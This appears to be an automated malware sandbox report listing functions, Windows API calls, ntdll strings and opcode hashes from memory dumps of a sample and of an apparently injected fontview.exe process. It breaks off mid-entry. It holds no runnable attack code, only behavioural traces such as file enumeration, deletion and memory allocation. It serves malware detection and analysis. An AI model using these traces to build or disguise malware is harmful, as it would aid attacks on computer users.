Instruction ID: 777320980948e8cbb6d043edf49d9ff1fa49addd8820b02bb71d92520beeea25
Opcode Fuzzy Hash: 3cd9a98fb061daac5d22ad45285d04f1fecc7b83f8e733c921ab4c6263ee1565
Instruction Fuzzy Hash: 7790026520180403E944755C48046070005D7D1306F55C055A3064555ECB29CD696235

Function 013E3010 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: feefaf923f482ef59972bee011e122dabd6a1018264fa0d6a894ba658b8a0b34
Instruction ID: 3c7c7d5d9df448d31f3d8e26c255f3c891f654daa09e887a85f5c063a35e3ac7
Opcode Fuzzy Hash: feefaf923f482ef59972bee011e122dabd6a1018264fa0d6a894ba658b8a0b34
Instruction Fuzzy Hash: E590022520184442E944725C4804B0F4105D7E2206F95C05DA5156554CCA15C96D5721

Function 013E3090 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a4b083b0f2a23cfce857dfe5ab14861428d52a028a2130745d746d905099e5d
Instruction ID: a7606b1223be93f920b0c2d3836cb2c9f573cbd8f27a839cca2873fec8b70422
Opcode Fuzzy Hash: 1a4b083b0f2a23cfce857dfe5ab14861428d52a028a2130745d746d905099e5d
Instruction Fuzzy Hash: 5990022524140802E944715C84147070006D7D1605F55C055A1024554DC716CA7D67B1

Function 013E39B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4675e95facb8161b1295bd4bac0e317c6be3820b7ddedea5bac9233c8f980bd7
Instruction ID: d7be5d81bdc5bb736023bd15bc10d40459749a32c530c192be7c3807b36cb4af
Opcode Fuzzy Hash: 4675e95facb8161b1295bd4bac0e317c6be3820b7ddedea5bac9233c8f980bd7
Instruction Fuzzy Hash: F490022524545102E954715C44046164005F7E1205F55C065A1814594DC655C96D6321

Function 013E3D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0d93c6eb53a84ab0bb8a54210aa60672162615decb7810d27d9c9d89a5a4c05
Instruction ID: 23fe6c82392eca9ae5c24da038e65724ef72f3eb0b66750b976a0e5920bd12bf
Opcode Fuzzy Hash: f0d93c6eb53a84ab0bb8a54210aa60672162615decb7810d27d9c9d89a5a4c05
Instruction Fuzzy Hash: 7A90023520240142ED44725C5804A4E4105D7E2306B95D459A1015554CCA14C9795321

Function 013E3D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22bacf594624d8aa9c975963a506470fd9057d6b5666b4e5d7b7eaf3e2f929b3
Instruction ID: 784b6b1dfa356d4682bffd6e9353cbb5dd12008924456fde238cfcc361b6efb4
Opcode Fuzzy Hash: 22bacf594624d8aa9c975963a506470fd9057d6b5666b4e5d7b7eaf3e2f929b3
Instruction Fuzzy Hash: F190023920140402ED14715C58046460046D7D1305F55D455A1424558DC754C9B9A221

Function 013E2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 46a830ceae61201440c0c2751dd38be761a4f67d4aff9a4c28cd8bea71b176a6
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 013E2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 013E293C
___swprintf_l.LIBCMT ref: 013E295E
___swprintf_l.LIBCMT ref: 013E29A3
___swprintf_l.LIBCMT ref: 0141A52E

Strings

::%hs%u.%u.%u.%u, xrefs: 0141A527
::ffff:0:%u.%u.%u.%u, xrefs: 0141A54E
:%u.%u.%u.%u, xrefs: 0141A5B8
ffff:, xrefs: 0141A504

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: e21360135dddf877a1d10d24e8db4a0c89dd28a814a921cced2a1cbb5cf3e11c
Instruction ID: 7e6a33ed2f1766bab1f784a76daffb1e33f559676e3662e86bb8e42d66b2451d
Opcode Fuzzy Hash: e21360135dddf877a1d10d24e8db4a0c89dd28a814a921cced2a1cbb5cf3e11c
Instruction Fuzzy Hash: 6D51E9B6A0426ABFCB15DB9C889497FFBFCBB082487148129F569D7685D334DE10C7A0

Function 01452410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 014524A6
___swprintf_l.LIBCMT ref: 014524E2
___swprintf_l.LIBCMT ref: 0145257D
___swprintf_l.LIBCMT ref: 014525A3
___swprintf_l.LIBCMT ref: 014525C8
___swprintf_l.LIBCMT ref: 01452608

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 014524DA
ffff:, xrefs: 0145247D, 0145249D
:%u.%u.%u.%u, xrefs: 014525FF
::%hs%u.%u.%u.%u, xrefs: 0145249E

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 6ab90e385ef9a43291135c7140a15ff1975fcd625c6533f1944a793eaec71aef
Instruction ID: b6982c0db6a63c298ed6d051a7719d3c0ced52b6dc70439d7e68010e62701787
Opcode Fuzzy Hash: 6ab90e385ef9a43291135c7140a15ff1975fcd625c6533f1944a793eaec71aef
Instruction Fuzzy Hash: EE510675A04649EBCB64DF6CC980C7FBBF9AB44208B00842BE99AD7753D6F4DA008760

Function 013D7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

Execute=1, xrefs: 01414713
CLIENT(ntdll): Processing section info %ws..., xrefs: 01414787
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01414655
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01414742
ExecuteOptions, xrefs: 014146A0
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 014146FC
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01414725

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 43d2784986ad6053deb26887be5b0b4b4f985d1f45a863a7ec8d963a06281a5b
Instruction ID: f177b74a13418b51293a3e7e8325596932aebd900ecefda3a089b647ddec81f2
Opcode Fuzzy Hash: 43d2784986ad6053deb26887be5b0b4b4f985d1f45a863a7ec8d963a06281a5b
Instruction Fuzzy Hash: 3D513A326003197AEF20ABA9FC85FBA77B8EF1471CF4404A9E605A72D1E7719A458F50

Function 01476940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction ID: 01f3855bd08d1cab6eb701cafd4119eb36325d607e7ac0b3b6dbc107b8902740
Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction Fuzzy Hash: 390257B1508742AFE305CF19C494AAFBBE6EFD8704F45892EF9854B260DB31E905CB52

Function 013EB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 013EB6BF

Strings

0, xrefs: 013EB66F
+, xrefs: 013EB65A
0, xrefs: 013EB695
-, xrefs: 013EB650

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 0dcb7ee6d5bcd4e1e68b21ca9d0830ca0a3eb8972b69b7101b47acaf5137dec2
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 0881CF70E453698EEF268E6CC8597FEFFE1AF45328F18411AD861A76D9C6309840CB61

Function 014520E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0145214F
___swprintf_l.LIBCMT ref: 01452172

Strings

[, xrefs: 0145212B
]:%u, xrefs: 01452169
%%%u, xrefs: 01452146

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: d3358dc8f7c87fd749061b5acc60d8a72da5d7d0a2d054c968bb69c5156b846c
Instruction ID: 98e902b2314c554246e6e91c49d9514a615b8ba1a3268e1622c2faf46cb041fb
Opcode Fuzzy Hash: d3358dc8f7c87fd749061b5acc60d8a72da5d7d0a2d054c968bb69c5156b846c
Instruction Fuzzy Hash: 8C2151BAA0021AABDB50DE7DDC44EFFBBE9EF54644F04011BEE05E3245E77099018BA1

Function 013CF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 014102BD
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 014102E7
RTL: Re-Waiting, xrefs: 0141031E

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 89a52cb7f1f2a64327134cbc9b618c5e5be1e7b62df00a599293bd230123bbe0
Instruction ID: 8525c0e72fe1df1fb91c0ea45f072f8589e1c323a3c6fcb2915661dbbbe3af98
Opcode Fuzzy Hash: 89a52cb7f1f2a64327134cbc9b618c5e5be1e7b62df00a599293bd230123bbe0
Instruction Fuzzy Hash: 51E1CE306047419FD725CF28C884B6ABBE9BB84B28F140A1EF5A5CB3E1D774D885CB42

Function 013DBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Resource at %p, xrefs: 01417B8E
RTL: Re-Waiting, xrefs: 01417BAC
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01417B7F

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: d6ada730c971e8fe26f4fe536442cbad9f51a1ae5092f09fa7b8781b1382b2f8
Instruction ID: 5a6bac113b4435f8023d75c2d388792dd5fc86a4ef3d9387a0d38869210fadec
Opcode Fuzzy Hash: d6ada730c971e8fe26f4fe536442cbad9f51a1ae5092f09fa7b8781b1382b2f8
Instruction Fuzzy Hash: A041E6327007029FD720DE29D840B6BB7E9EF9A719F100A5EF95AD7790DB31E4098B91

Function 013DB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0141728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01417294
RTL: Resource at %p, xrefs: 014172A3
RTL: Re-Waiting, xrefs: 014172C1

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: a1c7be0363794eed2da67c72325e370f1bbd5b92e13be6f64fb20a297545b506
Instruction ID: d7e4183cf06e0a7dbe7c4b8e26f902e1230dc814a302a41209f60f0859e2ca76
Opcode Fuzzy Hash: a1c7be0363794eed2da67c72325e370f1bbd5b92e13be6f64fb20a297545b506
Instruction Fuzzy Hash: 79412032700206ABC720CF29CC41BA6B7A5FB95719F20061EF945AB394DB31E84687D0

Function 01452300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0145238D
___swprintf_l.LIBCMT ref: 014523B3

Strings

%%%u, xrefs: 01452384
]:%u, xrefs: 014523AA

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 8bf92cf99390b23ee8c82f7c97e8e81db1e2505dddaa027697e46d4482d3fb0f
Instruction ID: 3bb6e1aac8d56b5b77ce51a6e5577329a21d7c2f8ea25c1ee49b299ce44426a8
Opcode Fuzzy Hash: 8bf92cf99390b23ee8c82f7c97e8e81db1e2505dddaa027697e46d4482d3fb0f
Instruction Fuzzy Hash: 65316472A00219DEDB60DE3DCC40FAB77A8AB54614F44059BED49E3242EB70AA498B60

Function 013E7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 013E7E8B

Strings

-, xrefs: 013E7DDD
+, xrefs: 013E7DE8

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: cfde26dfad9a22237bd7890271f1e9dcbbd881a098b82671fa98bb1206151984
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 3391A471E0032A9ADF24DF6DC8886BEBBE5EF84328F14451AE955E72C0D7308D428791

Function 013A9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 013A9191
@, xrefs: 013A9175

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 81c2674514464a66333dd793a71493ae79df88601137d008572cd3da0627dae9
Instruction ID: 05fb158d110529e45b263830a8ad6fde79e49df50ff4619a560c1eeb522a00ca
Opcode Fuzzy Hash: 81c2674514464a66333dd793a71493ae79df88601137d008572cd3da0627dae9
Instruction Fuzzy Hash: CB812C71D002699BDB36CB54CC48BEEB7B4AB58714F0045EAEA0DB7690E7705E84CFA0

Analysis Process: fontview.exePID: 7820, Parent PID: 1072COMMON

Execution Graph

Execution Coverage:	2.5%
Dynamic/Decrypted Code Coverage:	4.4%
Signature Coverage:	1.6%
Total number of Nodes:	433
Total number of Limit Nodes:	72

Executed Functions

Function 0018C620 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00000000), ref: 0018C704
FindNextFileW.KERNELBASE(?,00000010), ref: 0018C73F
FindClose.KERNELBASE(?), ref: 0018C74A

Memory Dump Source

Source File: 0000000C.00000002.3123177691.0000000000170000.00000040.80000000.00040000.00000000.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_170000_fontview.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 643fd15e7f8b435a0576e3a045acd148031a1b06abca2b7a4a690d260d12758f
Instruction ID: 24a3b7ac74973e5d00c2cd764adc732a69c7131c5fa4182741cc418a22da693e
Opcode Fuzzy Hash: 643fd15e7f8b435a0576e3a045acd148031a1b06abca2b7a4a690d260d12758f
Instruction Fuzzy Hash: FF318375900348BBDB20EFA4CC86FEF777CAB54754F144599B548A6181EB70AB848FA0

Function 00199230 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 0019932E

Memory Dump Source

Source File: 0000000C.00000002.3123177691.0000000000170000.00000040.80000000.00040000.00000000.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_170000_fontview.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b4f9b5df1f402157c59d906f20674b2621188f723f02e4dfc7baa05e3e9ce15b
Instruction ID: bdd3e951be8dc1ead679e74853e4d7d780a1035487bbfc47edab0f7fbb205aab
Opcode Fuzzy Hash: b4f9b5df1f402157c59d906f20674b2621188f723f02e4dfc7baa05e3e9ce15b
Instruction Fuzzy Hash: DF31A1B5A01208AFDB04DF99D881EEEB7F9EF8C314F108219F919A7340D730A951CBA5

Function 001993A0 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00199486

Memory Dump Source

Source File: 0000000C.00000002.3123177691.0000000000170000.00000040.80000000.00040000.00000000.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_170000_fontview.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1accb701036fe0b3973ad047301ca0853896ddb321a0e7957e777a53b9129590
Instruction ID: 5e7b06443526e2de8a0a362add98090b30a27f3dc7ea30605c6464245aee107c
Opcode Fuzzy Hash: 1accb701036fe0b3973ad047301ca0853896ddb321a0e7957e777a53b9129590
Instruction Fuzzy Hash: 9B31C5B5A00208AFDB14DF98D881EEEB7F9EF88714F108219F959A7240D730A9118BA5

Function 001996A0 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00181DAB,?,0019801F,00000000,00000004,00003000,?,?,?,?,?,0019801F,00181DAB,?,0019801F,00000000), ref: 00199768

Memory Dump Source

Source File: 0000000C.00000002.3123177691.0000000000170000.00000040.80000000.00040000.00000000.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_170000_fontview.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b3ffcdbcbb1590a596d095b537df45e89737ec899a43b0cfb861cbfcbd872378
Instruction ID: ac032f4476fb4a9344a5e997628ca767576e152851c970608f160da616c77418
Opcode Fuzzy Hash: b3ffcdbcbb1590a596d095b537df45e89737ec899a43b0cfb861cbfcbd872378
Instruction Fuzzy Hash: A3212AB5A00209AFDB14DF98DC82EEFB7B9EF88700F108119FD59A7240D770A911CBA5

Function 00199490 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON

Download Yara Rule

APIs

NtDeleteFile.NTDLL(?), ref: 00199526

Memory Dump Source

Source File: 0000000C.00000002.3123177691.0000000000170000.00000040.80000000.00040000.00000000.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_170000_fontview.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 75cb5cd24e979088526dacce1bb62981f5712a33649db5ee196efe9a4cbbd663
Instruction ID: 6c7f84a275b61f9d893860c1290f7bd7844723db42db7db3b99f861f2dc28717
Opcode Fuzzy Hash: 75cb5cd24e979088526dacce1bb62981f5712a33649db5ee196efe9a4cbbd663
Instruction Fuzzy Hash: FC11A071610208BFDA20EBA8CC42FAB77ACDF85714F008549FA58AB281D7717905C7A6

Function 00199530 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00199564

Memory Dump Source

Source File: 0000000C.00000002.3123177691.0000000000170000.00000040.80000000.00040000.00000000.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_170000_fontview.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: e33e25bd6fdd54fc274541ce9e87240fbf749594cc00fe192e3613e851b57e26
Instruction ID: 477197b33879f29f0d32c3278b0f424aeac9fe5606b52aadca9021f6afd47a23
Opcode Fuzzy Hash: e33e25bd6fdd54fc274541ce9e87240fbf749594cc00fe192e3613e851b57e26
Instruction Fuzzy Hash: 1EE086352402147BC610EA59DC01F9B776CDFC5724F408415FA08A7241C771B901C7F5

Function 04404650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0440465A

Memory Dump Source

Source File: 0000000C.00000002.3128204993.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000C.00000002.3128204993.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4390000_fontview.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 401486ffe3ed67b8ae4874dfcb29a3c007deb248c37d8e0c70fbe0cf868e3e8e
Instruction ID: ed30c93c0cb3c3ae08430c3b3ff0f1b0a1043a91828f8e9f3b2a33f26744b090
Opcode Fuzzy Hash: 401486ffe3ed67b8ae4874dfcb29a3c007deb248c37d8e0c70fbe0cf868e3e8e
Instruction Fuzzy Hash: 0A9002716415004365407158480440670059BF2345395C117A0555561C871CD9559269

Function 04404340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0440434A

Memory Dump Source

Source File: 0000000C.00000002.3128204993.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000C.00000002.3128204993.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4390000_fontview.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 888025bab0837d87b1d827b0a99dc78fdb40b653525d50ce8024277ce08ad10e
Instruction ID: 89c3b2303f2cb517ddfb73b66c8daf98896566f4a888da1d8b697b939600e474
Opcode Fuzzy Hash: 888025bab0837d87b1d827b0a99dc78fdb40b653525d50ce8024277ce08ad10e
Instruction Fuzzy Hash: 0590023164580013B5407158488454650059BF1345B55C013E0425555C8B18DA565361

Function 04402C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04402C6A

Memory Dump Source

Source File: 0000000C.00000002.3128204993.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000C.00000002.3128204993.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4390000_fontview.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 067cb95fa071b88f7e6ac7d1adb9f0b9b2e747aaa3eea4803d25973b9318995b
Instruction ID: 702345d465801d5f3e7969f7eefccc64a7323722620f13ffa06a9fcf069e1b08
Opcode Fuzzy Hash: 067cb95fa071b88f7e6ac7d1adb9f0b9b2e747aaa3eea4803d25973b9318995b
Instruction Fuzzy Hash: D890023124140843F50071584404B4610058BF1345F55C017A0125655D8719D9517521

Function 04402C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04402C7A

Memory Dump Source

Source File: 0000000C.00000002.3128204993.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000C.00000002.3128204993.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4390000_fontview.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 75087595f7c948d0cadba87878a68dedbc95482f5345d51a770b7b9183ecbf68
Instruction ID: e10a939f7f26a76e33cf17c665864f20942635193caa452be6af56f63d173df5
